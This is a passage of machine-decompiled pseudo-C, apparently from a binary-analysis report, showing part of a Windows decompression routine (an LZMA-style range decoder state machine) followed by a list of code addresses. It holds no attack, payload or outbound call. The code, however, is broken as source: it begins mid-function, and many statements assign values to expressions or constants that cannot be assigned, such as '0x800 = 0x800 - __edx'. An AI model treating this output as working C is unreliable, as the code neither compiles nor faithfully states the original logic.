												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063e3
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063eb
                                                                                                                                                              0x004063f5
                                                                                                                                                              0x00406403
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066dc
                                                                                                                                                              0x004066e3
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406714
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406716
                                                                                                                                                              0x0040671f
